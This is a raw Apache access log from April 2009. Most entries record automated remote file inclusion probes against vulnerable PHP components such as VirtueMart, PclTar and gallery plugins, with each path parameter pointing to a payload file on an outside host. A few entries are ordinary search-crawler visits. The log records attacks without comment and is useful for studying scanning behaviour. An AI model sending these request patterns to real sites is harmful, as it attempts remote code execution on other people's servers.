74.55.30.194 - - [26/Apr/2009:19:00:15 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.111.154.16 - - [26/Apr/2009:19:04:39 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:19:04:39 -0500] "GET /_vti_cnf?M=D HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:19:04:40 -0500] "GET /_vti_cnf/?M=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
83.226.185.169 - - [26/Apr/2009:19:04:42 -0500] "GET /logs/access_log.1236643200/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.226.185.169 - - [26/Apr/2009:19:04:42 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.226.185.169 - - [26/Apr/2009:19:04:42 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.226.185.169 - - [26/Apr/2009:19:04:49 -0500] "GET /logs/access_log.1236556800/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
78.129.214.105 - - [26/Apr/2009:19:05:52 -0500] "GET /logs/access_log.1232064000/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.129.214.105 - - [26/Apr/2009:19:05:52 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.129.214.105 - - [26/Apr/2009:19:05:52 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
78.129.214.105 - - [26/Apr/2009:19:05:52 -0500] "GET /logs/access_log.1231718400/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.226.185.169 - - [26/Apr/2009:19:06:32 -0500] "GET /logs/access_log.1236643200/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [26/Apr/2009:19:06:40 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [26/Apr/2009:19:06:40 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.226.185.169 - - [26/Apr/2009:19:06:47 -0500] "GET /logs/access_log.1236556800/bbs/skin/zero_vote/ask_password.php?dir=http://kaitenz.altervista.org/id.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [26/Apr/2009:19:08:17 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:19:08:17 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:19:08:17 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.140.23.192 - - [26/Apr/2009:19:09:03 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.111.154.16 - - [26/Apr/2009:19:09:27 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:19:09:28 -0500] "GET /_vti_cnf?S=D HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [26/Apr/2009:19:09:29 -0500] "GET /_vti_cnf/?S=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
85.18.117.101 - - [26/Apr/2009:19:10:32 -0500] "GET /logs/access_log.1236643200/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:10:32 -0500] "GET /logs/access_log.1232064000/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:10:32 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:10:32 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.172.60.242 - - [26/Apr/2009:19:11:39 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://70.38.120.161/~anyhost/wp-content/uploads/chid?%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.819"
209.172.60.242 - - [26/Apr/2009:19:11:42 -0500] "GET //modules/xfsection/modify.php?dir_module=http://70.38.120.161/~anyhost/wp-content/uploads/chid?%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.819"
77.221.130.18 - - [26/Apr/2009:19:12:12 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:12 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:12 -0500] "GET /logs/access_log.1231718400/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:20 -0500] "GET /logs/access_log.1232064000/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:21 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:21 -0500] "GET /logs/access_log.1231718400/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:21 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:19:12:28 -0500] "GET /logs/access_log.1232064000/bbs/skin/zero_vote/ask_password.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:14:55 -0500] "GET /logs/access_log.1236643200/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:14:55 -0500] "GET /logs/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:14:55 -0500] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:19:15:10 -0500] "GET /logs/access_log.1232064000/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:28:43 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:28:43 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:28:43 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
68.171.46.5 - - [26/Apr/2009:19:31:26 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fellowshipbibleannarbor.org/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
68.171.46.5 - - [26/Apr/2009:19:31:26 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fellowshipbibleannarbor.org/idoff1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
68.171.46.5 - - [26/Apr/2009:19:31:26 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fellowshipbibleannarbor.org/idoff1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
68.171.46.5 - - [26/Apr/2009:19:31:54 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fellowshipbibleannarbor.org/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.98.100.202 - - [26/Apr/2009:19:33:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/yes.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
65.98.100.202 - - [26/Apr/2009:19:33:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.brightonsupply.com/shop//administrator/components/com_virtuemart/jss/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
74.55.30.194 - - [26/Apr/2009:19:40:42 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
114.4.8.14 - - [26/Apr/2009:19:49:18 -0500] "GET /logs/access_log.1234224000//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.4.8.14 - - [26/Apr/2009:19:49:21 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
114.4.8.14 - - [26/Apr/2009:19:49:51 -0500] "GET /logs/access_log.1231718400//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:54:21 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:54:21 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:19:54:21 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.106.167 - - [26/Apr/2009:19:57:09 -0500] "GET /logs/access_log.1182384000 HTTP/1.0" 200 1891 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.30.194 - - [26/Apr/2009:20:05:59 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:20:06:48 -0500] "GET //?_PHPLIB[libdir]=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:20:06:48 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:20:06:48 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:08:54 -0500] "GET /includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:08:54 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:08:54 -0500] "GET /logs/access_log.1234656000/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:09:12 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:09:12 -0500] "GET /?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:09:14 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 187151 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:09:15 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:09:15 -0500] "GET /logs/access_log.1234656000/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:09:15 -0500] "GET /includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:09:32 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:09:40 -0500] "GET /logs/access_log.1235433600/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:09:42 -0500] "GET /logs/access_log.1235433600/includes/class_item.php?fileExtension=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:32 -0500] "GET /?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:32 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:34 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 187151 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:39 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:39 -0500] "GET /?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:42 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 187151 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:44 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:45 -0500] "GET /?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:10:46 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 200 187151 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:10:51 -0500] "GET /logs//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:10:51 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:10:52 -0500] "GET //errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:11:09 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:12:33 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:12:37 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.15 - - [26/Apr/2009:20:12:52 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:14:32 -0500] "GET //errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:14:32 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:14:32 -0500] "GET /logs//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:14:32 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:16:34 -0500] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:16:34 -0500] "GET //libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:16:44 -0500] "GET /logs/access_log.1236297600//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:17:04 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:17:08 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:17:08 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:17:08 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:17:08 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:18 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:18 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:19 -0500] "GET //errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:19 -0500] "GET /logs//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:20 -0500] "GET //errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:20 -0500] "GET /logs//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:25 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.18 - - [26/Apr/2009:20:18:25 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.106.228 - - [26/Apr/2009:20:18:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.219.232.137 - - [26/Apr/2009:20:19:03 -0500] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:19:04 -0500] "GET //libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:19:04 -0500] "GET /logs/access_log.1239667200//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.219.232.137 - - [26/Apr/2009:20:19:45 -0500] "GET /logs/access_log.1236297600//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.246.20.221 - - [26/Apr/2009:20:25:36 -0500] "GET /logs/access_log.1234224000//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.246.20.221 - - [26/Apr/2009:20:25:38 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
218.246.20.221 - - [26/Apr/2009:20:27:03 -0500] "GET /logs/access_log.1231718400//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.64.34.249 - - [26/Apr/2009:20:27:18 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.34.249 - - [26/Apr/2009:20:27:18 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.64.34.249 - - [26/Apr/2009:20:27:18 -0500] "GET /logs/access_log.1233014400/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:28:30 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:28:30 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:28:30 -0500] "GET /logs/access_log.1236124800//include/admin.lib.inc.php?site_path=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [26/Apr/2009:20:29:43 -0500] "GET /logs/access_log.1239667200//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.18.117.101 - - [26/Apr/2009:20:30:36 -0500] "GET /logs/access_log.1231718400/bbs/skin/zero_vote/ask_password.php?dir=http://kq-china.com/web/templates/ja_purity/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.208.130 - - [26/Apr/2009:20:35:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [26/Apr/2009:20:35:02 -0500] "GET /logs/access_log.1226534400 HTTP/1.1" 200 14293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [26/Apr/2009:20:35:02 -0500] "GET /logs/access_log.1227398400 HTTP/1.1" 200 32615 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
